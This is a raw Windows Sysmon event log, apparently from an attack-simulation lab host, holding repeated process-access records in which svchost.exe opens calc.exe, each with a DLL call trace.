10341000x8000000000000000361524Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361523Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361522Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361521Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361520Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361519Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361518Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361517Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361516Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361515Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361514Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361513Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361512Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361511Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361510Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361509Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361508Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361507Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361506Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361505Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361504Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361503Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.054{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361502Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 